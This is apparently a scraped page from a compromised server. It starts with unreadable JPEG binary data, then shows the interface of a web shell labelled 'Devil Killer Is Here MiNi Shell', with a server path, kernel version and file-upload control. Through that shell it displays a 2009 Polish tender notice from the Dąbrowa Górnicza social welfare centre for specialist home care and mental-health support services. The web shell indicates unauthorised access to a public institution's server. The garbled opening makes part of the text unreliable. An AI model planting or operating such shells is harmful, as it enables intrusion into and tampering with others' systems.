JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090106/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090106/3905-N-2009.html

<p class="kh_header"><b>Dąbrowa Górnicza: Organizowanie i świadczenie w miejscu zamieszkania specjalistycznych usług opiekuńczych oraz   specjalistycznych usług dla osób z zaburzeniami psychicznymi w Gminie Dąbrowa Górnicza</b><br>
<b>Numer ogłoszenia: 3905 - 2009; data zamieszczenia: 06.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Skibińskiego 1, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2622528, faks 032 2613694.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.mops.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizowanie i świadczenie w miejscu zamieszkania specjalistycznych usług opiekuńczych oraz   specjalistycznych usług dla osób z zaburzeniami psychicznymi w Gminie Dąbrowa Górnicza.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 

Organizowanie i świadczenie w miejscu zamieszkania specjalistycznych usług opiekuńczych oraz   specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w Gminie Dąbrowa Górnicza.  ZP 1    6U  MOPS2009

Ww. usługi  są świadczone zgodnie z  art.17 ust 1 pkt 11, art.18.1pkt 3, art. 50. 1,art. 50.2 art. 50.4 Ustawy o Pomocy Społecznej  (  Dz. U.  z 2008 r. Nr 115 poz. 728 z późn. zm. ) oraz Rozporządzenia  Ministra Polityki Społecznej ( w sprawie specjalistycznych usług opiekuńczych  Dz. U. z 2005 r.  Nr 189 poz. 1598 oraz  Dz. U. z 2006 r. , Nr 134, poz. 943 zmieniające rozporządzenie  w sprawie specjalistycznych usług opiekuńczych ).

III.1 Specjalistyczne usługi opiekuńcze są to usługi dostosowane do szczególnych potrzeb życiowych  osób, wynikających z rodzaju ich schorzenia  lub niepełnosprawności ,świadczone przez osoby ze specjalistycznym przygotowaniem zawodowym.

Sprawowanie opieki nad chorym z zaburzeniami psychicznymi - określa Rozporządzenie Ministra Polityki Społecznej  z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz. U. z 2005 r.  Nr 189 poz. 1598 ) oraz Rozporządzenie  Ministra Polityki Społecznej (Dz. U. z 2006 r. Nr 134, poz. 943 zmieniające rozporządzenie  w sprawie specjalistycznych usług opiekuńczych ).

III.2 Do zadań Wykonawcy w zakresie  specjalistycznych usług opiekuńczych  w szczególności należy: 
1. uczenie i rozwijanie  umiejętności  niezbędnych  do samodzielnego  życia, w tym zwłaszcza:
a) kształtowanie umiejętności  zaspokajania  podstawowych potrzeb życiowych  i umiejętności  społecznego funkcjonowania, motywowanie  do aktywności, leczenia i rehabilitacji, prowadzenie treningów umiejętności samoobsługi  i umiejętności społecznych oraz wspieranie, także w formie asystowania  w codziennych  czynnościach  życiowych  takich , jak:

-   samoobsługa, zwłaszcza wykonywanie czynności gospodarczych  i porządkowych , w tym  
    umiejętność  utrzymania i prowadzenia domu,
-   dbałość o higienę  i wygląd,
-   utrzymywanie kontaktów z domownikami, rówieśnikami , w miejscu  nauki i pracy oraz ze  
    społecznością  lokalną,
-   wspólne organizowanie i spędzanie czasu wolnego,
-   korzystanie z usług różnych instytucji, 
b) interwencja i pomoc w życiu w rodzinie , w tym:
-   pomoc w radzeniu  sobie w  sytuacjach kryzysowych - poradnictwo  specjalistyczne,    
    interwencje kryzysowe,  wsparcie psychologiczne , rozmowy terapeutyczne,
-   ułatwienie  dostępu do edukacji  i kultury,
-  doradztwo, koordynacja działań  innych służb  na rzecz rodziny , której członkiem jest osoba    
    uzyskująca pomoc w formie  specjalistycznych usług,
-   kształtowanie pozytywnych relacji  osoby wspieranej  z osobami bliskimi,
-   współpraca z rodziną - kształtowanie odpowiednich postaw wobec osoby  chorującej, 
    niepełnosprawnej, 
c) pomoc w załatwianiu  spraw urzędowych, w tym:
-   w uzyskiwaniu świadczeń  socjalnych, emerytalno -  rentowych,
-   w wypełnianiu dokumentów urzędowych,
d) wspieranie i pomoc  w uzyskaniu zatrudnienia, w tym zwłaszcza:
-   w szukaniu informacji o pracy, pomoc w znalezieniu zatrudnienia albo alternatywnego 
    zajęcia, w szczególności uczestnictwo w zajęciach warsztatów  terapii zajęciowej,  
    zakładach aktywności zawodowej, środowiskowych domach samopomocy, centrach i  
    klubach    integracji  społecznej, klubach pracy,
-   w kompletowaniu  dokumentów  potrzebnych do  zatrudnienia,
-   w przygotowaniu do  rozmowy z pracodawcą , wspieranie i asystowanie w kontaktach z pracodawcą, 
-   w rozwiązywaniu problemów psychicznych  wynikających z pracy lub jej braku,
e) pomoc w gospodarowaniu  pieniędzmi, w tym:
-  nauka planowania budżetu, asystowaniu przy  ponoszeniu wydatków,
-  pomoc w uzyskaniu ulg w opłatach,
-  zwiększanie umiejętności  gospodarowania  własnym budżetem  oraz  usamodzielnienie  finansowe,
2. pielęgnacja- jako wspieranie procesu  leczenia, w tym:
-  pomoc  w dostępie do świadczeń zdrowotnych,
-  uzgadnianie i pilnowanie terminów  wizyt lekarskich, badań diagnostycznych,
-  pomoc w wykupywaniu  lub zamawianiu leków w aptece,
-  pilnowanie przyjmowania leków  oraz  obserwowanie ewentualnych skutków  ubocznych
   ich stosowania,
-  w szczególnie uzasadnionych przypadkach  zmiana opatrunków , pomoc  w użyciu środków  
   pomocniczych  i materiałów  medycznych, przedmiotów ortopedycznych , a  także  
   w utrzymaniu higieny,
-  pomoc  w dotarciu do  placówek służby zdrowia, 
-  pomoc w dotarciu  do placówek rehabilitacyjnych,
3.rehabilitacja  fizyczna i usprawnienie  zaburzonych  funkcji organizmu  w zakresie  nieobjętym przepisami  ustawy z dnia 27 sierpnia 2008 r. oświadczeniach  opieki zdrowotnej  finansowanych ze środków  publicznych ( Dz. U. Nr 164, poz. 1027  z 2008 r.).
-  zgodnie  z zaleceniami  lekarskimi  lub specjalisty   z zakresu  rehabilitacji ruchowej  lub fizjoterapii,
-  współpraca ze specjalistami  w zakresie  wspierania psychologiczno -  pedagogicznego
    i edukacyjno - terapeutycznego zmierzającego  do wielostronnej  aktywizacji osoby korzystającej ze specjalistycznych usług,
4. pomoc mieszkaniowa , w tym:
-  w uzyskaniu mieszkania, negocjowaniu wnoszeniu opłat,
- organizowaniu  drobnych  remontów,  adaptacji, napraw, likwidacji  barier  
   architektonicznych,
- kształtowanie właściwych  relacji  osoby uzyskującej  pomoc  z sąsiadami i gospodarzem domu,
III.3   Do zadań Wykonawcy  w zakresie specjalistycznych usług  dla osób z zaburzeniami psychicznymi dostosowanych do szczególnych potrzeb osób wymagających pomocy w formie specjalistycznych usług , wynikających z rodzaju  ich schorzenia  lub niepełnosprawności , świadczone przez osoby ze specjalistycznym przygotowaniem zawodowym  w szczególności należy:
1. uczenie i rozwijanie  umiejętności  niezbędnych  do samodzielnego  życia, w tym zwłaszcza:
a) kształtowanie umiejętności  zaspokajania  podstawowych potrzeb życiowych  i umiejętności  społecznego funkcjonowania, motywowanie  do aktywności, leczenia i rehabilitacji, prowadzenie treningów umiejętności samoobsługi  i umiejętności społecznych oraz wspieranie, także w formie asystowania  w codziennych  czynnościach  życiowych  takich , jak:
-  samoobsługa, zwłaszcza wykonywanie czynności gospodarczych  i porządkowych , w tym 
   umiejętność  utrzymania i prowadzenia domu,
-  dbałość o higienę  i wygląd,
-  utrzymywanie kontaktów z domownikami, rówieśnikami, w miejscu  nauki i pracy oraz ze społecznością  lokalną,
-  wspólne organizowanie i spędzanie czasu wolnego,
-  korzystanie z usług różnych instytucji, 
b)  interwencja i pomoc w życiu w rodzinie , w tym:
-  pomoc w radzeniu  sobie w  sytuacjach kryzysowych - poradnictwo  specjalistyczne,   interwencje kryzysowe,  wsparcie psychologiczne , rozmowy terapeutyczne,
-  ułatwienie  dostępu do edukacji  i kultury,
-  doradztwo, koordynacja działań  innych służb  na rzecz rodziny , której członkiem jest osoba  
   uzyskująca pomoc w formie  specjalistycznych usług,
-  kształtowanie pozytywnych relacji  osoby wspieranej  z osobami bliskimi,
-  współpraca z rodziną - kształtowanie odpowiednich postaw wobec osoby  chorującej,  niepełnosprawnej,
c) pomoc w załatwianiu  spraw urzędowych, w tym:
-  w uzyskiwaniu świadczeń  socjalnych, emerytalno -  rentowych,
-  w wypełnianiu dokumentów urzędowych,
d) wspieranie i pomoc  w uzyskaniu zatrudnienia, w tym zwłaszcza:
-  w szukaniu informacji o pracy, pomoc w znalezieniu zatrudnienia albo alternatywnego 
   zajęcia, w szczególności uczestnictwo w zajęciach warsztatów  terapii zajęciowej, 
   zakładach   aktywności zawodowej, środowiskowych domach samopomocy, centrach i  
   klubach     integracji społecznej, klubach pracy ,
-  w kompletowaniu  dokumentów  potrzebnych do  zatrudnienia,
-  w przygotowaniu do  rozmowy z pracodawcą , wspieranie i asystowanie w kontaktach 
   z pracodawcą, 
-  w rozwiązywaniu problemów psychicznych  wynikających z pracy lub jej braku,
e)  pomoc w gospodarowaniu  pieniędzmi, w tym:
-  nauka planowania budżetu, asystowanie przy  ponoszeniu wydatków,
-  pomoc w uzyskaniu ulg w opłatach,
-  zwiększanie umiejętności  gospodarowania  własnym budżetem  oraz  usamodzielnianie
   finansowe,

2. pielęgnacja - jako wspieranie procesu  leczenia, w tym:
-  pomoc  w dostępie do świadczeń zdrowotnych,
-  uzgadnianie i pilnowanie terminów wizyt lekarskich, badań diagnostycznych,
-  pomoc w wykupywaniu  lub zamawianiu leków w aptece,
-  pilnowanie przyjmowania leków  oraz  obserwowanie ewentualnych skutków  ubocznych 
    ich stosowania,
-  w szczególnie uzasadnionych przypadkach  zmiana opatrunków , pomoc  w użyciu środków  
   pomocniczych  i materiałów  medycznych, przedmiotów ortopedycznych , a  także  
   w utrzymaniu higieny,
-  pomoc  w dotarciu do  placówek służby zdrowia, 
-  pomoc w dotarciu  do placówek rehabilitacyjnych,
3. rehabilitacja  fizyczna i usprawnienie  zaburzonych  funkcji organizmu  w zakresie  nieobjętym przepisami  ustawy z dnia 27 sierpnia 2008 r. o  oświadczeniach  opieki zdrowotnej  finansowanych ze środków  publicznych   ( Dz. U. Nr 164, poz. 1027  z 2008 r.):
-  zgodnie  z zaleceniami  lekarskimi  lub specjalisty   z zakresu  rehabilitacji ruchowej  lub 
     fizjoterapii,
-  współpraca ze specjalistami  w zakresie  wspierania psychologiczno -  pedagogicznego 
    i edukacyjno - terapeutycznego zmierzającego  do wielostronnej  aktywizacji osoby
     korzystającej ze specjalistycznych usług,
4. pomoc mieszkaniowa , w tym:
-   w uzyskaniu mieszkania, negocjowaniu wnoszeniu opłat,
-   w organizacji   drobnych  remontów,  adaptacji, napraw, likwidacji  barier 
    architektonicznych,
-   kształtowanie właściwych  relacji  osoby uzyskującej  pomoc  z sąsiadami i gospodarzem 
    domu,
5. zapewnienie dzieciom  i młodzieży  z zaburzeniami  psychicznymi  dostępu do zajęć rehabilitacyjnych  i rewalidacyjno -  wychowawczych , w wyjątkowych  przypadkach,  jeżeli nie mają możliwości uzyskania  dostępu do zajęć określonych w ustawie  z dnia 19 sierpnia 1994r. o ochronie zdrowia psychicznego (Dz. U. Nr 111 poz. 535 z późn. zm.)

III.4	 Wspólny słownik zamówień publicznych CPV:  
85320000 - 8 - usługi społeczne
85000000 - 9 - usługi w zakresie zdrowia i opieki,
85311100 - 3 - usługi opieki społecznej dla osób starszych,
85511200 - 4 - usługi opieki społecznej dla osób niepełnosprawnych
III.5	Przewidywana maksymalna  ilość godzin miesięcznie  specjalistycznych usług opiekuńczych wynosi: do 1800  godzin w skali miesiąca, w skali zamówienia  maksymalnie do 19 800 godzin.
III.6   Przewidywana maksymalna  ilość godzin miesięcznie  specjalistycznych usług dla osób z zaburzeniami psychicznymi wynosi: do 1600 godzin w skali miesiąca, w skali zamówienia  maksymalnie  do 17600 godzin.
III.7  Nie wykorzystana ilość godzin w danym miesiącu może być przesunięta do wykorzystania w kolejnych miesiącach, jeżeli zaistnieje taka potrzeba , jednak po uprzednim uzgodnieniu z Zamawiającym.
III.8	Zamawiający zastrzega  sobie prawo  zmiany ilości godzin  przedmiotu zamówienia  w zależności od  wysokości posiadanych środków  w roku  budżetowym  oraz  w zależności  od potrzeb wynikających  ze zmiennej ilości  osób kwalifikujących się  do danego rodzaju usług.
III.9	Specjalistyczne usługi opiekuńcze oraz specjalistyczne usługi dla osób z zaburzeniami psychicznym mogą być świadczone  w dni robocze, w dni świąteczne i wolne od pracy w miejscu zamieszkania lub czasowego pobytu osoby, której przyznano pomoc w zakresie specjalistycznych usług opiekuńczych lub specjalistycznych usług dla osób z zaburzeniami psychicznymi. 
III.10	Zlecenie realizacji specjalistycznych usług opiekuńczych lub  specjalistycznych usług dla osób z zaburzeniami psychicznymi  na rzecz konkretnej osoby  będzie przekazywane Wykonawcy na piśmie. Wykonawca otrzyma od pracownika MOPS kopię decyzji  administracyjnej, zgodnie z którą obejmie klienta  usługą w czasookresach i wymiarze godzin określonych w decyzji administracyjnej.   
III.11	Za datę rozpoczęcia świadczenia specjalistycznych  usług opiekuńczych lub specjalistycznych usług dla osób z zaburzeniami psychicznymi  na rzecz klientów  uważa się datę określoną w decyzji administracyjnej. 
III.12	W szczególnych okolicznościach (np. powrót klienta ze szpitala, nagłe pogorszenie stanu zdrowia) dopuszcza się możliwość rozpoczęcia świadczenia usług przed wydaniem decyzji administracyjnej na wniosek  Zamawiającego tj. zgłoszenie ustne, telefoniczne lub faksem. Decyzja w takim przypadku zostanie przekazana Wykonawcy niezwłocznie.
III.13	W wyjątkowych sytuacjach np. nagłe pogorszenie stanu zdrowia dopuszcza się możliwość ustnego , telefonicznego lub faksem zgłoszenia zmiany ilości godzin świadczonych specjalistycznych  usług opiekuńczych lub specjalistycznych usług dla osób z zaburzeniami psychicznymi określonych w decyzji administracyjnej, co następnie zostanie potwierdzone nową decyzją administracyjną dostarczoną niezwłocznie Wykonawcy.
III.14	 Wykonawca zobowiązany jest objąć klienta usługą niezwłocznie , jednak nie później niż w terminie 12 godzin od chwili zgłoszenia przez Zamawiającego.
III.15	Za datę zakończenia świadczenia usług na rzecz klienta uważa się datę określoną w decyzji administracyjnej.
III.16  Opłata za specjalistyczne usługi jest wnoszona przez osobę uzyskującą pomoc w formie specjalistycznej usługi lub jej opiekuna, bezpośrednio lub przelewem do kasy MOPS w terminie do 15 dnia każdego miesiąca  następującego po miesiącu , w którym wykonano usługę. ( Rozporządzenie Ministra Polityki Społecznej  w sprawie specjalistycznych usług opiekuńczych  Dz. U. z 2005 r.  Nr 189 poz. 1598 oraz  Dz. U. z 2006 r. , Nr 134, poz. 943 zmieniające rozporządzenie  w sprawie specjalistycznych usług opiekuńczych ).
W przypadku wnoszenia opłaty przelewem:
  Nr   rachunku MOPS 51105012271000002325707632
III.17. Dopuszcza się, że  odpłatność za świadczone usługi od klienta będzie dokonywał Wykonawca  indywidualnie od każdego klienta do kasy MOPS na podstawie otrzymanego upoważnienia wystawionego przez klienta , który ma przyznane usługi w drodze decyzji administracyjnej.  Kopię wpłaty KP Wykonawca dostarczy niezwłocznie klientowi.
III.18. Wykonawca zobowiązuje prowadzić  współpracę z pracownikami socjalnymi oraz innymi upoważnionymi pracownikami MOPS. Przez współpracę rozumie się wymianę informacji dotyczącą  osób i  rodzin  objętych pomocą Ośrodka i korzystających  ze wsparcia w formie specjalistycznych usług opiekuńczych oraz specjalistycznych usług dla osób z zaburzeniami psychicznymi.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 85.32.00.00-8, 85.00.00.00-9, 85.31.11.00-3, 85.51.12.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu  oraz opis sposobu dokonywania oceny spełniania tych warunków. 
O udzielenie zamówienia określonego w niniejszej  specyfikacji mogą ubiegać się wykonawcy, którzy:

1. spełniają wymagania określone w art. 22 ust. 1  i nie podlegają wykluczeniu  
    z postępowania  o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy z dnia  
    29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2007 r.  Nr  223 poz. 1655 
    oraz Dz. U. Nr 171, poz. 1058 z 2008 r.)
    

2. dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne
    zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania
    zamówienia , tj.  posiadających odpowiednie  kwalifikacje i wymagane uprawnienia do
    świadczenia specjalistycznych usług opiekuńczych oraz specjalistycznych usług
    opiekuńczych dla osób zaburzonych psychiczne nakładane Ustawą o pomocy  
    społecznej oraz Rozporządzeniem Ministra Polityki Społecznej  w sprawie  
    specjalistycznych usług opiekuńczych   ( Dz. U. z 2006 r. Nr 134, poz. 943 zmieniające rozporządzenie w sprawie specjalistycznych usług opiekuńczych)

3.  w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie 
     zamówienia , a w przypadku gdy okres  prowadzenia działalności jest krótszy- w tym  okresie, wykonali usługę odpowiadającą swoim rodzajem i wartością usłudze
       stanowiącej przedmiot zamówienia. Przez usługę odpowiadającą swoim rodzajem i  wartością przedmiot zamówienia  należy rozumieć  minimum jedno zamówienie podobne  do przedmiotu zamówienia tj. wykonanie średniorocznie w okresie ostatnich 3 lat  przed  dniem wszczęcia postępowania, a w przypadku gdy okres  prowadzenia działalności jest 
       krótszy- w tym okresie,  co najmniej 17 000  godzin  specjalistycznych usług
       opiekuńczych oraz  średniorocznie 15 000 godzin  specjalistycznych usług opiekuńczych 
       dla osób z zaburzeniami psychicznymi , których wartość  jest równa lub przekracza 
       200 000,00 zł w (skali zamówienia). 

4.    posiadają  ubezpieczenie  od odpowiedzialności  cywilnej w zakresie  prowadzonej 
        działalności.
         

             
Ocena spełnienia  warunków - udziału  w postępowaniu  ( formalnych)  i zdolności  do wykonania  zamówienia ( merytorycznych)  - wymaganych   od Wykonawców  dokonywana będzie  w oparciu  o złożone wraz z ofertą  oświadczenia o spełnieniu  warunków  udziału  w postępowaniu  o udzielenie zamówienia  publicznego  i  dokumenty  potwierdzające  spełnienie tych warunków według  formuły spełnia - nie spełnia. Wymagania dotyczące  zabezpieczenia  należytego wykonania umowy.

1.  Wykonawca, którego oferta została uznana  za najkorzystniejszą , jest zobowiązany  wnieść  zabezpieczenie należytego wykonania umowy  w wysokości 3 %  całkowitej ceny ofertowej na czas trwania umowy. ( art. 150 ustawy - Prawo zamówień publicznych) 
2.Obowiązek wniesienia zabezpieczenia należytego wykonania umowy obciąża Wykonawcę wyłonionego w drodze postępowania o udzielenie zamówienia publicznego. Zabezpieczenie należytego wykonania umowy służy do pokrycia roszczeń z tytułu nie wykonania lub nienależytego wykonania zamówienia.
3.Zabezpieczenie , o którym mowa wyżej , Wykonawca wnosi najpóźniej w dniu zawarcia umowy.
4.Zabezpieczenie  może być wniesione w :
- pieniądzu
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -  
  kredytowej , z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym,
- gwarancjach bankowych, 
- gwarancjach ubezpieczeniowych, 
- poręczeniach udzielanych  przez podmioty , o których  mowa w art. 6 b ust. 5 pkt  2 ustawy  z dnia 9 listopada  2000 r.  o utworzeniu  Polskiej  Agencji  Rozwoju Przedsiębiorczości.
5.Zabezpieczenie należytego wykonania umowy wnoszone w formie pieniężnej w dniu zawarcia umowy winno być na  niżej podanym rachunku bankowym Zamawiającego. 
Nazwa: ING BANK SLĄSKI  66105012271000002293017683
6. Jeżeli zabezpieczenie należytego wykonania umowy wniesiono w pieniądzu, zamawiający przechowuje je na oprocentowanym rachunku bankowym.
    Jeżeli zabezpieczenie zostało wniesione w pieniądzu , zamawiający zwróci je wraz  z odsetkami wynikającymi z umowy rachunku bankowego , na którym były one przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji  bankowej za przelew pieniędzy na rachunek Wykonawcy.  
7. W przypadku wnoszenia zabezpieczenia  w formie gwarancji lub poręczeń powinny być one wystawione  na okres  realizacji zamówienia oraz czynności odbioru i potwierdzenia prawidłowego wykonania umowy i oryginał  wniesiony do kasy MOPS . 
8. Zwrot zabezpieczenia  należytego wykonania umowy  nastąpi w terminie  30 dni  od dnia stwierdzenia  przez Zamawiającego,  że przedmiot umowy został wykonany należycie.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie  spełnienia warunków, o których mowa w rozdziale V SIWZ Wykonawca winien przedłożyć następujące dokumenty: 

1. Aktualny  odpis  z właściwego rejestru lub aktualne  zaświadczenie  o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej  niż  6 miesięcy  przed upływem terminu składania ofert.

2.   Oświadczenie stwierdzające, że Wykonawca spełnia wymagania określone w art. 22 ust.1 oraz nie podlega wykluczeniu  z art.  24 ust 1 i 2 ustawy   Prawo zamówień publicznych.  
W przypadku składania ofert przez  Wykonawców występujących wspólnie, oświadczenie składa odrębnie każdy Wykonawca  ubiegający się  o udzielenie zamówienia wg. wzoru - załącznik  nr 2  SIWZ - wskazana aktualna data podpisania dokumentu.

3.   Polisa, a w  przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, będącej przedmiotem niniejszego zamówienia.

4. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych wykonywanych    usług w okresie  ostatnich trzech lat  przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego , a jeżeli okres  prowadzenia działalności  jest krótszy - w tym okresie,  odpowiadających swoim rodzajem  i wartością  usługom stanowiącym  przedmiot zamówienia z podaniem ich wartości , ilości godzin , rodzaju usług , dat wykonania oraz odbiorców  z uwzględnieniem warunku  o którym mowa w rozdz. V pkt 3. SIWZ - dokumenty potwierdzające , że  usługi, o których mowa w rozdz. V pkt 3  zostały wykonane należycie np. 1 referencja , opinia lub inny dokument potwierdzający wykonanie usługi jw. - załącznik nr 4

5. Wykaz osób , którymi  dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć  w wykonaniu  zamówienia  wraz z danymi na temat ich kwalifikacji  niezbędnych do wykonania zamówienia , także zakresu wykonywanych przez nich specjalistycznych usług opiekuńczych oraz usług specjalistycznych dla osób z zaburzeniami psychicznymi   - załącznik nr 5 do SIWZ
